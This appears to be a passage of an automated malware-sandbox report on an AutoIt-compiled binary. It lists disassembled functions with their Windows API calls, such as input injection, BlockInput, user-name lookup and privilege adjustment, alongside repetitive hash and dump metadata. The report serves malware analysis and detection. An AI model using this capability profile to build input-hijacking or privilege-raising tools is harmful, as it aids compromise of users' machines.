                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b8364b5efd292c4cfd5f881465ce573812839a46ce9fd56d8a08d17e8d287f40
                                                                                                                                                                                                                                                                                            • Instruction ID: e3fb3e4d9190c84fbe4831da14122494fd1c00f35c00a2cbe8626da06e510097
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8364b5efd292c4cfd5f881465ce573812839a46ce9fd56d8a08d17e8d287f40
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51E04631011548AFCF216F50DD08F5C3B79EB51385F014014F81A8B531DB36DE42DAC0
                                                                                                                                                                                                                                                                                            Function 00C7ECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00C7ED04
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: mouse_event
                                                                                                                                                                                                                                                                                            • String ID: DOWN
                                                                                                                                                                                                                                                                                            • API String ID: 2434400541-711622031
                                                                                                                                                                                                                                                                                            • Opcode ID: 01c8e18fff8a68551ef82480c0d77ac755c1193e481bbf60de0ab1a1148a9682
                                                                                                                                                                                                                                                                                            • Instruction ID: 08159b2f291d9b11f7f05402e0c9901a8bf29feb7bc2031437dd19e030d859ad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01c8e18fff8a68551ef82480c0d77ac755c1193e481bbf60de0ab1a1148a9682
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26E0CD671AD7353CB90821187C07EF7034C8F26734B1141D7FC14D51C0ED505D4255A5
                                                                                                                                                                                                                                                                                            Function 00C6E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00C6E664
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                                                            • String ID: X64
                                                                                                                                                                                                                                                                                            • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                            • Opcode ID: 2c23bd7dccfbf7645524d37195cba2ff2dd1f77a53cefba421d02c5b5260cb63
                                                                                                                                                                                                                                                                                            • Instruction ID: 89ab17dec5a5e25b9b36aa9aba63b11c2233ed0fbbf6761784216d6a0b071bbd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c23bd7dccfbf7645524d37195cba2ff2dd1f77a53cefba421d02c5b5260cb63
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DD0C9B880112DEACB90CB90ECC8EDE777CBB05304F100652F106A2000D73095488B20
                                                                                                                                                                                                                                                                                            Function 00C841FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C952EE,?,?,00000035,?), ref: 00C84229
                                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C952EE,?,?,00000035,?), ref: 00C84239
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d70e9ed6d9678ad4ccf32bd4d14afd709015313819ff6f96e8afbff9fd711d33
                                                                                                                                                                                                                                                                                            • Instruction ID: 18b57d314838d7580e64f27875cd34c198292ff3c7b75a3e2ac513f60db1d189
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d70e9ed6d9678ad4ccf32bd4d14afd709015313819ff6f96e8afbff9fd711d33
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BF0E5346042256AEB2026669C4DFEF366EEFC6765F000275F506D3191D9709E40D7B1
                                                                                                                                                                                                                                                                                            Function 00C7BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C7BC24
                                                                                                                                                                                                                                                                                            • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00C7BC37
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 272e27a37a17a1e91c37d21622e82a906d73042feddaffbf7f992a8dac323c33
                                                                                                                                                                                                                                                                                            • Instruction ID: 324016a478fd3f93acde1bb048e46e54a08777b2ee728f87dbb5542f69b8542a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 272e27a37a17a1e91c37d21622e82a906d73042feddaffbf7f992a8dac323c33
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8F01D7180424DABDB059FA5C805BFE7BB4FF08309F04C409F956A6191D7798611DF95
                                                                                                                                                                                                                                                                                            Function 00C71A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C71B48), ref: 00C71A20
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00C71B48), ref: 00C71A35
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 59954a0f234cd571b14b7b455e05018bcd2d79fdd54459fcddf5253b83557d42
                                                                                                                                                                                                                                                                                            • Instruction ID: 782d39c8cdffadb62baf7bfb3cbd8336e141e1a433fa5128039d0b2f23ebd3a7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59954a0f234cd571b14b7b455e05018bcd2d79fdd54459fcddf5253b83557d42
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06E0BF72015610AFE7252B14FC05FBB77A9FB04321F24891DF5A681870DB626C91EB50
                                                                                                                                                                                                                                                                                            Function 00C8F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 00C8F51A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d108c5e9703737e9a4c545466ae555e7a6e89458610e0df034c96d325159c927
                                                                                                                                                                                                                                                                                            • Instruction ID: 3326d1ffce4171d06900eda3d2633f04b609cd5ced6a18aa0d457e27346c2441
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d108c5e9703737e9a4c545466ae555e7a6e89458610e0df034c96d325159c927
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DE0DF322002049FC710AF6AD840A8AF7E8AFA5364F00842AFC4AC7311CA70F9819BA0
                                                                                                                                                                                                                                                                                            Function 00C30D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00C3075E), ref: 00C30D4A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e035f01093b88f59dc98854f9d5d2b649bbf3ebf0a99aa86b23666582c0b8706
                                                                                                                                                                                                                                                                                            • Instruction ID: 89c6feefa544ef6efed08cc21e30f567f1e486db5256af121fb21a007ac056fd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e035f01093b88f59dc98854f9d5d2b649bbf3ebf0a99aa86b23666582c0b8706
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                            Function 00C9353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C9358D
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C935A0
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00C935AF
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C935CA
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C935D1
                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C93700
                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C9370E
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C93755
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00C93761
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C9379D
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C937BF
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C937D2
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C937DD
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C937E6
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C937F5
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C937FE
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C93805
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C93810
                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C93822
                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CB0C04,00000000), ref: 00C93838
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C93848
                                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C9386E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C9388D
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C938AF
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C93A9C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                            • Opcode ID: c161193db0df89d819cea9d0d8515de91d8f5fc282bbae4ed5e80ff6561edc7f
                                                                                                                                                                                                                                                                                            • Instruction ID: bb8e86eed0328061499689deab874bef7e39648da0989cae9575eef61b7fda75
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c161193db0df89d819cea9d0d8515de91d8f5fc282bbae4ed5e80ff6561edc7f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B026A71900209AFDB14DF64CD89FAE7BB9FB49314F008558F916AB2A0DB74AE41DF60
                                                                                                                                                                                                                                                                                            Function 00CA7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00CA7B67
                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00CA7B98
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00CA7BA4
                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00CA7BBE
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00CA7BCD
                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00CA7BF8
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 00CA7C00
                                                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00CA7C07
                                                                                                                                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00CA7C16
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00CA7C1D
                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00CA7C68
                                                                                                                                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 00CA7C9A
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA7CBC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: GetSysColor.USER32(00000012), ref: 00CA7E5B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: SetTextColor.GDI32(?,00CA7B2D), ref: 00CA7E5F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: GetSysColorBrush.USER32(0000000F), ref: 00CA7E75
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: GetSysColor.USER32(0000000F), ref: 00CA7E80
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: GetSysColor.USER32(00000011), ref: 00CA7E9D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CA7EAB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: SelectObject.GDI32(?,00000000), ref: 00CA7EBC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: SetBkColor.GDI32(?,?), ref: 00CA7EC5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: SelectObject.GDI32(?,?), ref: 00CA7ED2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00CA7EF1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CA7F08
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: GetWindowLongW.USER32(?,000000F0), ref: 00CA7F15
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d298d6a3c82752e1fb0f5831490939a758317fbbfbd3c62ffc44a373ffe13d07
                                                                                                                                                                                                                                                                                            • Instruction ID: ff3ee9028f9a2dc68a6f37ad45420ce4bd19d51b0c0e4daf8afaafa1b7d4caae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d298d6a3c82752e1fb0f5831490939a758317fbbfbd3c62ffc44a373ffe13d07
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54A16CB2408302AFDB119F64DC48B6FBBA9FB4A338F100B19FA63975A0D775D9448B51
                                                                                                                                                                                                                                                                                            Function 00C11625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?), ref: 00C116B4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C52B07
                                                                                                                                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C52B40
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C52F85
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C11488,?,00000000,?,?,?,?,00C1145A,00000000,?), ref: 00C11865
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00C52FC1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C52FD8
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C52FEE
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C52FF9
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
